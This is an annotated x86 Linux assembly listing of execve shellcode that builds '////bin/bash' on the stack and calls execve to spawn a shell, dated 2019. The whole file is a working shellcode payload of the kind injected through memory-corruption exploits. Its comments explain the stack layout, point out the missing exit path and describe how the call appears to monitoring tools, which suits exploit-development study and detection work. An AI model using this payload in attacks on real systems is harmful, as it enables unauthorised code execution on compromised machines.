Spawn shell using execve-stack
; Execve Stack Shellcode
; Author: Aditya Chaudhary
; Date: 27th Jan 2019
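global _start

section .text

;-----------------------------------------------------------------------
; _start: replace the current process with /bin/bash through execve(2).
; Target: x86 (32-bit) Linux, int 0x80 system-call interface, NASM syntax.
;
; int execve(const char *filename, char *const argv[], char *const envp[]);
;   eax = 11 (0xb)   execve system-call number
;   ebx = filename   -> "////bin/bash", NUL-terminated
;   ecx = argv       -> { filename, NULL }
;   edx = envp       -> { NULL }  (a pointer to a zero word, not the value 0)
;
; All three arguments are built on the stack. Layout after the last push,
; lowest address first:
;   [esp+0]   pointer to the path   (argv[0])
;   [esp+4]   0                     (argv[1] = NULL)
;   [esp+8]   "////bin/bash"        (12 bytes)
;   [esp+20]  0                     (path terminator, doubles as envp[0])
;
; NOTE(review): nothing follows int 0x80. If execve fails and returns,
; execution runs past the end of this listing; there is no exit call.
;
; What this looks like from the monitoring side: a single execve whose
; path argument is "////bin/bash" (leading slashes kept as passed), with
; argv holding only argv[0] and an empty environment. A shell started
; with no environment at all is unusual for interactive or service use.
;-----------------------------------------------------------------------
_start:
        xor     eax, eax                ; eax = 0
        push    eax                     ; zero dword: terminates the path string
        mov     edx, esp                ; edx = envp -> { NULL }

        ; The path is padded to "////bin/bash" so that it is exactly three
        ; dwords; the extra leading slashes do not change which file is
        ; resolved. Pushed last-dword-first so it reads forward in memory.
        push    0x68736162              ; "bash"
        push    0x2f6e6962              ; "bin/"
        push    0x2f2f2f2f              ; "////"
        mov     ebx, esp                ; ebx = filename -> "////bin/bash\0"

        push    eax                     ; argv[1] = NULL
        push    ebx                     ; argv[0] = filename
        mov     ecx, esp                ; ecx = argv -> { filename, NULL }

        mov     al, 0xb                 ; eax is still 0 above al, so eax = 11 (execve)
        int     0x80                    ; execve(filename, argv, envp)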